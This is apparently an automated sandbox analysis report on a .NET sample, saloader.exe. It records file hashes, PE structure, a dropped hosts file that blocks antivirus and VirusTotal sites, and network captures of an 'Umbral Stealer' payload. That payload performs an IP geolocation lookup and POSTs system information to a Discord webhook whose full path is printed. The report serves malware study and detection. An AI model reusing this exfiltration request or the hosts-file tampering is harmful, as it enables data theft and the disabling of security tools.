                                                                                        SSDEEP:24:TLVF1kwNbXYFpFNYcw+6UwcQVXH5fBODYfOg1ZAJFF0DiUhQ5de5SjhXE1:ThFawNLopFgU10XJBODqzqFF0DYde5P
                                                                                        MD5:9664DAA86F8917816B588C715D97BE07
                                                                                        SHA1:FAD9771763CD861ED8F3A57004C4B371422B7761
                                                                                        SHA-256:8FED359D88F0588829BA60D236269B2528742F7F66DF3ACF22B32B8F883FE785
                                                                                        SHA-512:E551D5CC3D5709EE00F85BB92A25DDC96112A4357DFEA3D859559D47DB30FEBD2FD36BDFA2BEC6DCA63D3E233996E9FCD2237F92CEE5B32BA8D7F2E1913B2DA9
                                                                                        Malicious:false
                                                                                        Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                        C:\Windows\System32\drivers\etc\hosts

                                                                                        Download File
                                                                                        Process:C:\Users\user\Desktop\saloader.exe
                                                                                        File Type:ASCII text, with CRLF, LF line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):2223
                                                                                        Entropy (8bit):4.573013811987098
                                                                                        Encrypted:false
                                                                                        SSDEEP:48:vDZhyoZWM9rU5fFc7s9PI8A+VyUq8UwWsnNhUm:vDZEurK988TwU0wWsn/
                                                                                        MD5:C9901CB0AE22A9ABBD192B692AE4E2EB
                                                                                        SHA1:12976AC7024E5D1FF3FDF5E6A8251DC9C9205E39
                                                                                        SHA-256:3865EE9FBAF4813772CADE7B42A2E8AA8248734DD92FA5498D49947295E16EE0
                                                                                        SHA-512:E3E796F34E894C1B924B087CEC0CCA928BFD6FED71C462F30E79264EC3BF5353C434C69094FFB9EE0C3AD6DE694AA0B13B5490013AB1C28452C1CDC19C4F0E6F
                                                                                        Malicious:true
                                                                                        Preview:# Copyright (c) 1993-2009 Microsoft Corp...#..# This is a sample HOSTS file used by Microsoft TCP/IP for Windows...#..# This file contains the mappings of IP addresses to host names. Each..# entry should be kept on an individual line. The IP address should..# be placed in the first column followed by the corresponding host name...# The IP address and the host name should be separated by at least one..# space...#..# Additionally, comments (such as these) may be inserted on individual..# lines or following the machine name denoted by a '#' symbol...#..# For example:..#..# 102.54.94.97 rhino.acme.com # source server..# 38.25.63.10 x.acme.com # x client host....# localhost name resolution is handled within DNS itself...#.127.0.0.1 localhost..#.::1 localhost...0.0.0.0 virustotal.com..0.0.0.0 www.virustotal.com..0.0.0.0 avast.com..0.0.0.0 www.avast.com..0.0.0.0 totalav.com..0.0.0.0 www.totalav.com..0.0.0.0 scanguard.com..0.0.0.0 www.

                                                                                        Static File Info

                                                                                        General

                                                                                        File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                        Entropy (8bit):6.050139535659894
                                                                                        TrID:
                                                                                        • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                                                        • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                                        • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                        • Windows Screen Saver (13104/52) 0.07%
                                                                                        • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                        File name:saloader.exe
                                                                                        File size:235'008 bytes
                                                                                        MD5:1e10af7811808fc24065f18535cf1220
                                                                                        SHA1:65995bcb862aa66988e1bb0dbff75dcac9b400c7
                                                                                        SHA256:e07fd0ac793b06603be164c9ee73465af512cf17bed07614cbcd2a8410f04eed
                                                                                        SHA512:f1c623918a3701254805e7648d671b316446a0f98637d3de62d44331cf91502afb57ccb762472491bc4ac037fbf5f7b624eb9d39092b3be0b2ed84da6f3acadc
                                                                                        SSDEEP:6144:lloZMQfsXtioRkts/cnnK6cMldKRn/1+mpnsl3ySXCkb8e1muhi:noZItlRk83MldKRn/1+mpnsl3ySXze
                                                                                        TLSH:14346B4933B8CB17E25F9BBDD5B0549F87B1F143E80AF78E0C8895E82421B42E949E57
                                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l.a..........."...0.................. ........@.. ....................................`................................

                                                                                        File Icon

                                                                                        Icon Hash:00928e8e8686b000

                                                                                        Static PE Info

                                                                                        General

                                                                                        Entrypoint:0x43aa9e
                                                                                        Entrypoint Section:.text
                                                                                        Digitally signed:false
                                                                                        Imagebase:0x400000
                                                                                        Subsystem:windows gui
                                                                                        Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                                        DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                        Time Stamp:0x9C61056C [Wed Feb 19 18:54:36 2053 UTC]
                                                                                        TLS Callbacks:
                                                                                        CLR (.Net) Version:
                                                                                        OS Version Major:4
                                                                                        OS Version Minor:0
                                                                                        File Version Major:4
                                                                                        File Version Minor:0
                                                                                        Subsystem Version Major:4
                                                                                        Subsystem Version Minor:0
                                                                                        Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                        Entrypoint Preview

                                                                                        Instruction
                                                                                        jmp dword ptr [00402000h]
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al

                                                                                        Data Directories

                                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x3aa4c0x4f.text
                                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x3c0000x550.rsrc
                                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x3e0000xc.reloc
                                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x3aa300x1c.text
                                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                        Sections

                                                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                        .text0x20000x38aa40x38c00e30281924731c0acc0db6a2046fd7499False0.3988031731828194data6.0659771708952155IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                        .rsrc0x3c0000x5500x600962661cf515c57234d66775c661dfadeFalse0.4134114583333333data4.575008625258809IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                        .reloc0x3e0000xc0x2000ba71f33e486e8552fc7ee8251bdd63dFalse0.044921875data0.09800417566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                        Resources

                                                                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                        RT_VERSION0x3c0a00x2c4data0.4449152542372881
                                                                                        RT_MANIFEST0x3c3640x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                                                                        Imports

                                                                                        DLLImport
                                                                                        mscoree.dll_CorExeMain

                                                                                        Network Behavior

                                                                                        Network Port Distribution

                                                                                        TCP Packets

                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                        Nov 30, 2024 02:29:40.138663054 CET4976380192.168.2.7208.95.112.1
                                                                                        Nov 30, 2024 02:29:40.258677959 CET8049763208.95.112.1192.168.2.7
                                                                                        Nov 30, 2024 02:29:40.259562969 CET4976380192.168.2.7208.95.112.1
                                                                                        Nov 30, 2024 02:29:40.259860992 CET4976380192.168.2.7208.95.112.1
                                                                                        Nov 30, 2024 02:29:40.379735947 CET8049763208.95.112.1192.168.2.7
                                                                                        Nov 30, 2024 02:29:41.564929008 CET8049763208.95.112.1192.168.2.7
                                                                                        Nov 30, 2024 02:29:41.586730003 CET4976380192.168.2.7208.95.112.1
                                                                                        Nov 30, 2024 02:29:41.707088947 CET8049763208.95.112.1192.168.2.7
                                                                                        Nov 30, 2024 02:29:41.707173109 CET4976380192.168.2.7208.95.112.1
                                                                                        Nov 30, 2024 02:30:02.124218941 CET49813443192.168.2.7162.159.129.233
                                                                                        Nov 30, 2024 02:30:02.124258995 CET44349813162.159.129.233192.168.2.7
                                                                                        Nov 30, 2024 02:30:02.124339104 CET49813443192.168.2.7162.159.129.233
                                                                                        Nov 30, 2024 02:30:02.124918938 CET49813443192.168.2.7162.159.129.233
                                                                                        Nov 30, 2024 02:30:02.124938965 CET44349813162.159.129.233192.168.2.7
                                                                                        Nov 30, 2024 02:30:03.386985064 CET44349813162.159.129.233192.168.2.7
                                                                                        Nov 30, 2024 02:30:03.387061119 CET49813443192.168.2.7162.159.129.233
                                                                                        Nov 30, 2024 02:30:03.389544964 CET49813443192.168.2.7162.159.129.233
                                                                                        Nov 30, 2024 02:30:03.389555931 CET44349813162.159.129.233192.168.2.7
                                                                                        Nov 30, 2024 02:30:03.389846087 CET44349813162.159.129.233192.168.2.7
                                                                                        Nov 30, 2024 02:30:03.402585983 CET49813443192.168.2.7162.159.129.233
                                                                                        Nov 30, 2024 02:30:03.443337917 CET44349813162.159.129.233192.168.2.7
                                                                                        Nov 30, 2024 02:30:03.767364979 CET49813443192.168.2.7162.159.129.233
                                                                                        Nov 30, 2024 02:30:03.767398119 CET44349813162.159.129.233192.168.2.7
                                                                                        Nov 30, 2024 02:30:03.824661016 CET44349813162.159.129.233192.168.2.7
                                                                                        Nov 30, 2024 02:30:03.872874975 CET49813443192.168.2.7162.159.129.233
                                                                                        Nov 30, 2024 02:30:04.138380051 CET44349813162.159.129.233192.168.2.7
                                                                                        Nov 30, 2024 02:30:04.138505936 CET44349813162.159.129.233192.168.2.7
                                                                                        Nov 30, 2024 02:30:04.138673067 CET49813443192.168.2.7162.159.129.233
                                                                                        Nov 30, 2024 02:30:04.145239115 CET49813443192.168.2.7162.159.129.233
                                                                                        Nov 30, 2024 02:30:04.146473885 CET49819443192.168.2.7162.159.129.233
                                                                                        Nov 30, 2024 02:30:04.146512985 CET44349819162.159.129.233192.168.2.7
                                                                                        Nov 30, 2024 02:30:04.146609068 CET49819443192.168.2.7162.159.129.233
                                                                                        Nov 30, 2024 02:30:04.146863937 CET49819443192.168.2.7162.159.129.233
                                                                                        Nov 30, 2024 02:30:04.146879911 CET44349819162.159.129.233192.168.2.7
                                                                                        Nov 30, 2024 02:30:05.389278889 CET44349819162.159.129.233192.168.2.7
                                                                                        Nov 30, 2024 02:30:05.391019106 CET49819443192.168.2.7162.159.129.233
                                                                                        Nov 30, 2024 02:30:05.391027927 CET44349819162.159.129.233192.168.2.7
                                                                                        Nov 30, 2024 02:30:05.763874054 CET49819443192.168.2.7162.159.129.233
                                                                                        Nov 30, 2024 02:30:05.763899088 CET44349819162.159.129.233192.168.2.7
                                                                                        Nov 30, 2024 02:30:05.764249086 CET49819443192.168.2.7162.159.129.233
                                                                                        Nov 30, 2024 02:30:05.764249086 CET49819443192.168.2.7162.159.129.233
                                                                                        Nov 30, 2024 02:30:05.764265060 CET44349819162.159.129.233192.168.2.7
                                                                                        Nov 30, 2024 02:30:05.764282942 CET44349819162.159.129.233192.168.2.7
                                                                                        Nov 30, 2024 02:30:05.764369011 CET49819443192.168.2.7162.159.129.233
                                                                                        Nov 30, 2024 02:30:05.764400005 CET44349819162.159.129.233192.168.2.7
                                                                                        Nov 30, 2024 02:30:05.764488935 CET49819443192.168.2.7162.159.129.233
                                                                                        Nov 30, 2024 02:30:05.764506102 CET49819443192.168.2.7162.159.129.233
                                                                                        Nov 30, 2024 02:30:05.764563084 CET44349819162.159.129.233192.168.2.7
                                                                                        Nov 30, 2024 02:30:05.764681101 CET49819443192.168.2.7162.159.129.233
                                                                                        Nov 30, 2024 02:30:05.764693975 CET44349819162.159.129.233192.168.2.7
                                                                                        Nov 30, 2024 02:30:05.764709949 CET49819443192.168.2.7162.159.129.233
                                                                                        Nov 30, 2024 02:30:05.764719009 CET44349819162.159.129.233192.168.2.7
                                                                                        Nov 30, 2024 02:30:05.764730930 CET49819443192.168.2.7162.159.129.233
                                                                                        Nov 30, 2024 02:30:05.764743090 CET49819443192.168.2.7162.159.129.233
                                                                                        Nov 30, 2024 02:30:05.764744997 CET44349819162.159.129.233192.168.2.7
                                                                                        Nov 30, 2024 02:30:05.764755011 CET44349819162.159.129.233192.168.2.7
                                                                                        Nov 30, 2024 02:30:05.764857054 CET49819443192.168.2.7162.159.129.233
                                                                                        Nov 30, 2024 02:30:05.764877081 CET44349819162.159.129.233192.168.2.7
                                                                                        Nov 30, 2024 02:30:05.764934063 CET49819443192.168.2.7162.159.129.233
                                                                                        Nov 30, 2024 02:30:05.764947891 CET44349819162.159.129.233192.168.2.7
                                                                                        Nov 30, 2024 02:30:05.764962912 CET49819443192.168.2.7162.159.129.233
                                                                                        Nov 30, 2024 02:30:05.764966965 CET44349819162.159.129.233192.168.2.7
                                                                                        Nov 30, 2024 02:30:05.764990091 CET49819443192.168.2.7162.159.129.233
                                                                                        Nov 30, 2024 02:30:05.765002966 CET44349819162.159.129.233192.168.2.7
                                                                                        Nov 30, 2024 02:30:05.765053034 CET49819443192.168.2.7162.159.129.233
                                                                                        Nov 30, 2024 02:30:05.765072107 CET44349819162.159.129.233192.168.2.7
                                                                                        Nov 30, 2024 02:30:05.765130043 CET49819443192.168.2.7162.159.129.233
                                                                                        Nov 30, 2024 02:30:05.765141964 CET44349819162.159.129.233192.168.2.7
                                                                                        Nov 30, 2024 02:30:05.765167952 CET49819443192.168.2.7162.159.129.233
                                                                                        Nov 30, 2024 02:30:05.765176058 CET44349819162.159.129.233192.168.2.7
                                                                                        Nov 30, 2024 02:30:05.765259981 CET49819443192.168.2.7162.159.129.233
                                                                                        Nov 30, 2024 02:30:05.765273094 CET44349819162.159.129.233192.168.2.7
                                                                                        Nov 30, 2024 02:30:05.765326023 CET49819443192.168.2.7162.159.129.233
                                                                                        Nov 30, 2024 02:30:05.765382051 CET49819443192.168.2.7162.159.129.233
                                                                                        Nov 30, 2024 02:30:05.765444040 CET49819443192.168.2.7162.159.129.233
                                                                                        Nov 30, 2024 02:30:05.765501022 CET49819443192.168.2.7162.159.129.233
                                                                                        Nov 30, 2024 02:30:05.765571117 CET49819443192.168.2.7162.159.129.233
                                                                                        Nov 30, 2024 02:30:05.765642881 CET49819443192.168.2.7162.159.129.233
                                                                                        Nov 30, 2024 02:30:05.765716076 CET49819443192.168.2.7162.159.129.233
                                                                                        Nov 30, 2024 02:30:05.765887976 CET49819443192.168.2.7162.159.129.233
                                                                                        Nov 30, 2024 02:30:05.765990019 CET49819443192.168.2.7162.159.129.233
                                                                                        Nov 30, 2024 02:30:05.807326078 CET44349819162.159.129.233192.168.2.7
                                                                                        Nov 30, 2024 02:30:05.807706118 CET49819443192.168.2.7162.159.129.233
                                                                                        Nov 30, 2024 02:30:05.807871103 CET49819443192.168.2.7162.159.129.233
                                                                                        Nov 30, 2024 02:30:05.807918072 CET49819443192.168.2.7162.159.129.233
                                                                                        Nov 30, 2024 02:30:05.807981014 CET49819443192.168.2.7162.159.129.233
                                                                                        Nov 30, 2024 02:30:05.808043957 CET49819443192.168.2.7162.159.129.233
                                                                                        Nov 30, 2024 02:30:05.808106899 CET49819443192.168.2.7162.159.129.233
                                                                                        Nov 30, 2024 02:30:05.808167934 CET49819443192.168.2.7162.159.129.233
                                                                                        Nov 30, 2024 02:30:05.808214903 CET49819443192.168.2.7162.159.129.233
                                                                                        Nov 30, 2024 02:30:05.808296919 CET49819443192.168.2.7162.159.129.233
                                                                                        Nov 30, 2024 02:30:05.823370934 CET44349819162.159.129.233192.168.2.7
                                                                                        Nov 30, 2024 02:30:05.823569059 CET49819443192.168.2.7162.159.129.233
                                                                                        Nov 30, 2024 02:30:05.823781967 CET49819443192.168.2.7162.159.129.233
                                                                                        Nov 30, 2024 02:30:05.823832989 CET49819443192.168.2.7162.159.129.233
                                                                                        Nov 30, 2024 02:30:05.823843002 CET49819443192.168.2.7162.159.129.233
                                                                                        Nov 30, 2024 02:30:05.823860884 CET49819443192.168.2.7162.159.129.233
                                                                                        Nov 30, 2024 02:30:05.823904991 CET49819443192.168.2.7162.159.129.233
                                                                                        Nov 30, 2024 02:30:05.823921919 CET49819443192.168.2.7162.159.129.233
                                                                                        Nov 30, 2024 02:30:05.823939085 CET49819443192.168.2.7162.159.129.233
                                                                                        Nov 30, 2024 02:30:05.823981047 CET49819443192.168.2.7162.159.129.233
                                                                                        Nov 30, 2024 02:30:05.871325970 CET44349819162.159.129.233192.168.2.7
                                                                                        Nov 30, 2024 02:30:05.871423960 CET49819443192.168.2.7162.159.129.233
                                                                                        Nov 30, 2024 02:30:05.915327072 CET44349819162.159.129.233192.168.2.7
                                                                                        Nov 30, 2024 02:30:06.126723051 CET44349819162.159.129.233192.168.2.7
                                                                                        Nov 30, 2024 02:30:07.168490887 CET44349819162.159.129.233192.168.2.7
                                                                                        Nov 30, 2024 02:30:07.168576956 CET44349819162.159.129.233192.168.2.7
                                                                                        Nov 30, 2024 02:30:07.168661118 CET49819443192.168.2.7162.159.129.233
                                                                                        Nov 30, 2024 02:30:07.169321060 CET49819443192.168.2.7162.159.129.233

                                                                                        UDP Packets

                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                        Nov 30, 2024 02:29:39.999550104 CET5251153192.168.2.71.1.1.1
                                                                                        Nov 30, 2024 02:29:40.137722015 CET53525111.1.1.1192.168.2.7
                                                                                        Nov 30, 2024 02:30:01.985475063 CET5077753192.168.2.71.1.1.1
                                                                                        Nov 30, 2024 02:30:02.123331070 CET53507771.1.1.1192.168.2.7

                                                                                        DNS Queries

                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                        Nov 30, 2024 02:29:39.999550104 CET192.168.2.71.1.1.10xe427Standard query (0)ip-api.comA (IP address)IN (0x0001)false
                                                                                        Nov 30, 2024 02:30:01.985475063 CET192.168.2.71.1.1.10x5081Standard query (0)discordapp.comA (IP address)IN (0x0001)false

                                                                                        DNS Answers

                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                        Nov 30, 2024 02:29:40.137722015 CET1.1.1.1192.168.2.70xe427No error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                                                                                        Nov 30, 2024 02:30:02.123331070 CET1.1.1.1192.168.2.70x5081No error (0)discordapp.com162.159.129.233A (IP address)IN (0x0001)false
                                                                                        Nov 30, 2024 02:30:02.123331070 CET1.1.1.1192.168.2.70x5081No error (0)discordapp.com162.159.134.233A (IP address)IN (0x0001)false
                                                                                        Nov 30, 2024 02:30:02.123331070 CET1.1.1.1192.168.2.70x5081No error (0)discordapp.com162.159.133.233A (IP address)IN (0x0001)false
                                                                                        Nov 30, 2024 02:30:02.123331070 CET1.1.1.1192.168.2.70x5081No error (0)discordapp.com162.159.130.233A (IP address)IN (0x0001)false
                                                                                        Nov 30, 2024 02:30:02.123331070 CET1.1.1.1192.168.2.70x5081No error (0)discordapp.com162.159.135.233A (IP address)IN (0x0001)false

                                                                                        HTTP Request Dependency Graph

                                                                                        • discordapp.com
                                                                                        • ip-api.com

                                                                                        HTTP Packets

                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        0192.168.2.749763208.95.112.180520C:\Users\user\Desktop\saloader.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Nov 30, 2024 02:29:40.259860992 CET79OUTGET /json/?fields=225545 HTTP/1.1
                                                                                        Host: ip-api.com
                                                                                        Connection: Keep-Alive
                                                                                        Nov 30, 2024 02:29:41.564929008 CET381INHTTP/1.1 200 OK
                                                                                        Date: Sat, 30 Nov 2024 01:29:40 GMT
                                                                                        Content-Type: application/json; charset=utf-8
                                                                                        Content-Length: 204
                                                                                        Access-Control-Allow-Origin: *
                                                                                        X-Ttl: 60
                                                                                        X-Rl: 44
                                                                                        Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 22 2c 22 72 65 76 65 72 73 65 22 3a 22 73 74 61 74 69 63 2d 63 70 65 2d 38 2d 34 36 2d 31 32 33 2d 32 32 38 2e 63 65 6e 74 75 72 79 6c 69 6e 6b 2e 63 6f 6d 22 2c 22 6d 6f 62 69 6c 65 22 3a 66 61 6c 73 65 2c 22 70 72 6f 78 79 22 3a 66 61 6c 73 65 2c 22 71 75 65 72 79 22 3a 22 38 2e 34 36 2e 31 32 33 2e 32 32 38 22 7d
                                                                                        Data Ascii: {"status":"success","country":"United States","regionName":"New York","timezone":"America/New_York","reverse":"static-cpe-8-46-123-228.centurylink.com","mobile":false,"proxy":false,"query":"8.46.123.228"}


                                                                                        HTTPS Proxied Packets

                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        0192.168.2.749813162.159.129.233443520C:\Users\user\Desktop\saloader.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-30 01:30:03 UTC363OUTPOST /api/webhooks/1310580388070031360/HcT5cAwFckSLk1OKu346uVDw7gzPyJJvcWmU8BKJrBQSUsE3Q1GCqDtVn5MK3JlldJBn HTTP/1.1
                                                                                        Accept: application/json
                                                                                        User-Agent: Opera/9.80 (Windows NT 6.1; YB/4.0.0) Presto/2.12.388 Version/12.17
                                                                                        Content-Type: application/json; charset=utf-8
                                                                                        Host: discordapp.com
                                                                                        Content-Length: 939
                                                                                        Expect: 100-continue
                                                                                        Connection: Keep-Alive
                                                                                        2024-11-30 01:30:03 UTC939OUTData Raw: 7b 22 63 6f 6e 74 65 6e 74 22 3a 22 40 65 76 65 72 79 6f 6e 65 22 2c 22 65 6d 62 65 64 73 22 3a 5b 7b 22 74 69 74 6c 65 22 3a 22 55 6d 62 72 61 6c 20 53 74 65 61 6c 65 72 22 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 2a 2a 5f 5f 53 79 73 74 65 6d 20 49 6e 66 6f 5f 5f 2a 2a 5c 72 5c 6e 60 60 60 61 75 74 6f 68 6f 74 6b 65 79 5c 72 5c 6e 43 6f 6d 70 75 74 65 72 20 4e 61 6d 65 3a 20 36 31 30 39 33 30 5c 72 5c 6e 43 6f 6d 70 75 74 65 72 20 4f 53 3a 20 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 5c 72 5c 6e 54 6f 74 61 6c 20 4d 65 6d 6f 72 79 3a 20 34 20 47 42 5c 72 5c 6e 55 55 49 44 3a 20 31 39 38 38 32 37 34 32 2d 43 43 35 36 2d 31 41 35 39 2d 39 37 37 39 2d 46 42 38 43 42 46 41 31 45 32 39 44 5c 72 5c 6e 43 50 55 3a 20 49 6e
                                                                                        Data Ascii: {"content":"@everyone","embeds":[{"title":"Umbral Stealer","description":"**__System Info__**\r\n```autohotkey\r\nComputer Name: 610930\r\nComputer OS: Microsoft Windows 10 Pro\r\nTotal Memory: 4 GB\r\nUUID: 19882742-CC56-1A59-9779-FB8CBFA1E29D\r\nCPU: In
                                                                                        2024-11-30 01:30:03 UTC25INHTTP/1.1 100 Continue
                                                                                        2024-11-30 01:30:04 UTC1369INHTTP/1.1 404 Not Found
                                                                                        Date: Sat, 30 Nov 2024 01:30:03 GMT
                                                                                        Content-Type: application/json
                                                                                        Content-Length: 45
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=3600, s-maxage=3600
                                                                                        strict-transport-security: max-age=31536000; includeSubDomains
                                                                                        x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                                                        x-ratelimit-limit: 5
                                                                                        x-ratelimit-remaining: 4
                                                                                        x-ratelimit-reset: 1732930205
                                                                                        x-ratelimit-reset-after: 1
                                                                                        via: 1.1 google
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        CF-Cache-Status: DYNAMIC
                                                                                        Set-Cookie: __cf_bm=BX4kI7Aq45FoNWq_RPBuj0TQviwCVhF8WSsGHJmfl.Y-1732930203-1.0.1.1-naczNhouxrOVdJppKEeMAwYsDG3xslKJi8usFy1ZtObLvPTpsTP6.RSLJkVGTsXd6GPQa3NRVGZ1aPdUt4lQWg; path=/; expires=Sat, 30-Nov-24 02:00:03 GMT; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=utAiGLH4w22T4tKlph09QoYkB6UjvXL1X0iPPTk8YlHoVtxpSjvd7wmzHfXezhS7tdN9HCXx2UqgbRHMyWmRuNlUbsg43h9RkA2WfHiQegZWiWRcWK9Mm9OpVJoicj9H"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Set-Cookie: __cfruid=5426df9ee3509d1e165b7f3abf3be05aea69702d-1732930203; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                                                                                        Set-Cookie: _cfuvid=_FNztmRJ4OKeKfK7xSTIvQ4CxD40lHLgPDhYVb9W09g-1732930203983-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
